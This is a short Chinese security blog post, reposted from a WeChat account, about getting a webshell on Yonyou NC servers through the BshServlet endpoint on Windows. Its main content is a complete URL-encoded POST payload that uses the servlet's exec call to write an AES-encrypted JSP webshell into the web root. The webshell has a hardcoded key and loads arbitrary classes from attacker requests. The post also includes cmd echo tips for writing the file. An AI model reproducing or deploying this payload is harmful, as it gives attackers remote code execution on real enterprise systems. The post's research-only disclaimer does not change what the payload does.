0x00 前言/简介
0x01 写shell的小Tips
0x02 最重要的POST数据包
0x03 自动化利用EXP
0x04 总结
经过摸鱼N久的功夫,最终成功写入shell,如此便能够输出一个可用的Windows Echo Shell的EXP。
exec(cmd /c echo "shell-code" > shell.jsp);shell.jsp: "shell-code"
exec(cmd /c echo ">shell-code<" > shell.jsp);shell.jsp内容: ">shell-code<"
"bsh.script=exec%28%22cmd+%2Fc+echo+%5C%22%3E%3C%25%40page+import%3D%5C%22java.util.*%2Cjavax.crypto.*%2Cjavax.crypto.spec.*%5C%22%25%3E%3C%25%21class+U+extends+ClassLoader%7BU%28ClassLoader+c%29%7Bsuper%28c%29%3B%7Dpublic+Class+g%28byte+%5B%5Db%29%7Breturn+super.defineClass%28b%2C0%2Cb.length%29%3B%7D%7D%25%3E%3C%25if+%28request.getMethod%28%29.equals%28%5C%22POST%5C%22%29%29%7BString+k%3D%5C%22e45e329feb5d925b%5C%22%3Bsession.putValue%28%5C%22u%5C%22%2Ck%29%3BCipher+c%3DCipher.getInstance%28%5C%22AES%5C%22%29%3Bc.init%282%2Cnew+SecretKeySpec%28k.getBytes%28%29%2C%5C%22AES%5C%22%29%29%3Bnew+U%28this.getClass%28%29.getClassLoader%28%29%29.g%28c.doFinal%28new+sun.misc.BASE64Decoder%28%29.decodeBuffer%28request.getReader%28%29.readLine%28%29%29%29%29.newInstance%28%29.equals%28pageContext%29%3B%7D%25%3E%3C%5C%22+%3E+webapps%2Fnc_web%2Fshell.jsp%22%29%3B%0D%0A%0D%0A%0D%0A"
END
本文始发于微信公众号(NOVASEC):用友NC BshServlet Echo Shell Tips 与 EXP on Windows
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论